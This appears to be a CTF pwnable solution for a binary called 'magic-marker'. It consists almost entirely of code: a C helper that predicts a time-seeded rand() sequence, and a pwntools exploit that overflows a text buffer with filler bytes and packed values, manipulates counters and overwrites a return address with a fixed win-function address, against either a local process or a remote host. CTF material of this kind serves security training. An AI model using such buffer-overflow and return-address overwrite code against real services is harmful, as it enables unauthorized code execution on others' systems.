Tags: write-what-where pwn pwnable 


timer.c

```C
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/*
 * Print the first two values of rand() % 40, one per line, for a generator
 * seeded with the current time in whole seconds.
 *
 * exploit.py on this page reads these two lines as n1 and n2. srand()/rand()
 * are deterministic for a given seed, so any program that seeds the same libc
 * generator with time(0) during the same second produces the same sequence;
 * a time-seeded rand() therefore gives no unpredictability.
 * NOTE(review): presumably the target binary seeds this way -- its source is
 * not shown on this page.
 */
int main() {
    int draw;
    int i;

    /* The seed has one-second resolution. */
    srand(time(0));

    /* Draw and print in the same order: first value, then second. */
    for (i = 0; i < 2; i++) {
        draw = rand() % 40;
        printf("%d\n", draw);
    }

    return 0;
}

```

exploit.py

```python
from pwn import *

def pwn():
    """Replay the write/move sequence against the tube ``r``.

    Reads two integers from the helper tube ``h`` (the output of ./timer) and
    uses them as repeat counts for two write-then-move loops, then performs
    one final write and prints everything the target sends back.

    Relies on the module-level tubes ``h`` and ``r`` set up by the
    ``__main__`` block; takes no arguments and returns nothing.

    NOTE(review): the page lost its indentation. The loop bodies below were
    reconstructed from the original comments ("decrease ... to zero" needs
    one move per iteration) -- confirm against the author's copy.
    """
    # Values predicted by ./timer, one per line.
    first = int(h.recvline().strip())
    second = int(h.recvline().strip())

    r.sendline(b'jump up and down')

    menu_prompt = b'up):'
    write_prompt = b'write?'

    def write_then_move(marker, key):
        # One round: pick 'x', supply the text to write, then send a move key.
        r.recvuntil(menu_prompt)
        r.sendline(b'x')
        r.sendafter(write_prompt, marker)
        r.recvuntil(menu_prompt)
        r.sendline(key)

    # 28 filler bytes followed by a packed 32-bit value: the write reaches a
    # 4-byte field at offset 28. NOTE(review): presumably the target accepts
    # more bytes than its text buffer holds -- target source not on this page.
    marker_w = b'A'*28 + p32(8)
    marker_a = b'A'*28 + p32(1)

    # Original comment: decrease first random number to zero.
    for _ in range(first):
        write_then_move(marker_w, b'w')

    # Original comment: decrease second random number to -1.
    for _ in range(second + 1):
        write_then_move(marker_a, b'a')

    # Original comment: write win function address to return address.
    # The address is a fixed constant, so this assumes the binary is mapped at
    # a fixed base (presumably built without PIE -- confirm).
    r.recvuntil(menu_prompt)
    r.sendline(b'x')
    r.sendlineafter(write_prompt, b'A' * 8 + p64(0x400fa0))

    # recvall() reads until the peer closes the stream, so the interactive()
    # call after it has little left to attach to.
    print(r.recvall())
    r.interactive()

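if __name__ == '__main__':
    # Usage: exploit.py [HOST PORT]
    # With HOST and PORT the target is a remote service; with no arguments it
    # is the local ./magic-marker binary.
    target = sys.argv[1:]

    # The original tested len(sys.argv) > 1 and then read sys.argv[2], which
    # raised IndexError when only a host was given. Reject that case up front,
    # before any process is started.
    if len(target) == 1:
        sys.exit(f'usage: {sys.argv[0]} [HOST PORT]')

    # ./timer is started before the target tube is opened, as in the original.
    # Its seed is time(0), so both ends must start within the same second for
    # the printed values to match. NOTE(review): also assumes the local libc
    # rand() matches the target's.
    h = process('./timer')

    if target:
        r = remote(target[0], int(target[1]))
    else:
        r = process(['./magic-marker'])
        # PID of the local target, e.g. for attaching a debugger.
        # NOTE(review): placement inside this branch is reconstructed; the
        # page lost its indentation.
        print(util.proc.pidof(r))

    pwn()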
```